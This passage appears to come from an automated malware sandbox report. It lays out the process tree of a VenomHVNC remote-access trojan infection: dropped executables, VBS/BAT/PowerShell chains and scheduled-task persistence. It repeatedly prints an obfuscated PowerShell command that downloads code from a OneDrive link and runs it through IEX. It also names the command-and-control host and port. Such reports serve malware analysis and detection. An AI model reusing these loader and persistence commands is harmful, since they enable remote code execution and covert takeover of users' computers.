        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6168
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        17⤵
        
        PID:6392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        18⤵
        
        PID:8520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        19⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        14⤵
        
        PID:5908
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        15⤵
        
        PID:1492
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        15⤵
        
        PID:3180
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        15⤵
        
        PID:6100
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        14⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        14⤵
        
        PID:5148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5712
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        16⤵
        
        PID:7752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        17⤵
        
        PID:7472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        18⤵
        
        PID:6692
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        13⤵
        
        PID:5380
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        14⤵
        
        PID:1880
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        14⤵
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        13⤵
        
        PID:5200
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
        14⤵
        
        PID:10796
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpABBC.tmp.bat""
        14⤵
        
        PID:9792
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        15⤵
        Delays execution with timeout.exe
        
        PID:10852
        
        C:\Users\Admin\AppData\Roaming\System.exe
        
        "C:\Users\Admin\AppData\Roaming\System.exe"
        15⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        13⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6008
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        15⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        16⤵
        
        PID:7124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        17⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        12⤵
        
        PID:4408
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        13⤵
        
        PID:464
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        13⤵
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        12⤵
        
        PID:1940
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        12⤵
        
        PID:5796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5400
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        14⤵
        
        PID:3976
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        15⤵
        
        PID:7668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6456
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        11⤵
        
        PID:5788
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        12⤵
        
        PID:5912
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        12⤵
        
        PID:5940
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        12⤵
        
        PID:5960
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        11⤵
        
        PID:5992
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        11⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5448
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        13⤵
        
        PID:7868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        14⤵
        
        PID:7356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        15⤵
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        10⤵
        
        PID:2608
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        11⤵
        
        PID:5180
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        11⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        10⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        10⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6064
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        12⤵
        
        PID:8032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        13⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8276
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        9⤵
        
        PID:4772
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        10⤵
        
        PID:2640
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        10⤵
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        9⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        9⤵
        
        PID:1688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5572
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        11⤵
        
        PID:7752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        12⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        8⤵
        
        PID:4880
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        9⤵
        
        PID:4400
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        9⤵
        
        PID:2712
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        8⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        8⤵
        
        PID:2940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1120
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        10⤵
        
        PID:6724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        11⤵
        
        PID:7708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        12⤵
        
        PID:7780
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        7⤵
        
        PID:2072
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        8⤵
        
        PID:1988
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        8⤵
        
        PID:2776
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        7⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        7⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4632
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        9⤵
        
        PID:6708
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        10⤵
        
        PID:7724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        11⤵
        
        PID:7480
      - C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        6⤵
        
        PID:3200
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        7⤵
        
        PID:2004
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        7⤵
        
        PID:3356
      - C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        6⤵
        
        PID:4904
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
        7⤵
        
        PID:5248
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBAF3.tmp.bat""
        7⤵
        
        PID:1748
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:6500
        
        C:\Users\Admin\AppData\Roaming\System.exe
        
        "C:\Users\Admin\AppData\Roaming\System.exe"
        8⤵
        
        PID:7248
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        6⤵
        
        PID:336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4932
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        8⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        9⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1556
    - - C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        5⤵
        
        PID:1828
      - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        6⤵
        
        PID:1456
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        6⤵
        
        PID:3312
    - - C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        5⤵
        
        PID:3436
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        5⤵
        
        PID:1064
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3340
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1268
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        7⤵
        
        PID:6092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        8⤵
        
        PID:6308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4672
  - - C:\Users\Admin\AppData\Local\Temp\ClientH.exe
      "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4580
    - - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        5⤵
        
        PID:4516
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        5⤵
        
        PID:956
  - - C:\Users\Admin\AppData\Local\Temp\venom.exe
      "C:\Users\Admin\AppData\Local\Temp\venom.exe"
      4⤵
      Executes dropped EXE
      PID:4836
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
      4⤵
      PID:1944
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1472
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        6⤵
        
        PID:804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        7⤵
        
        PID:2872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7976
- - C:\Users\Admin\AppData\Local\Temp\ClientH.exe
    "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3532
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:2456
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
      4⤵
      PID:276
- - C:\Users\Admin\AppData\Local\Temp\venom.exe
